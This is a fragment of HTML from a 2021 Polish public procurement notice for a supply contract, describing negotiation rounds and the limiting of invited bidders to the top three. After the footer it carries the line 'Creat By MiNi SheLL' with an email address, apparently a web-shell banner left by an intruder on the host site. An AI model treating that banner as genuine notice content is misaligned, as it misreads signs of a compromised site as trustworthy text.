negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający zastrzega, że może ograniczyć ilość zaproszonych Wykonawców do <br/>złożenia ofert dodatkowych, których oferty zajmą w rankingu oceny ofert miejsca 1-3.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-27 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com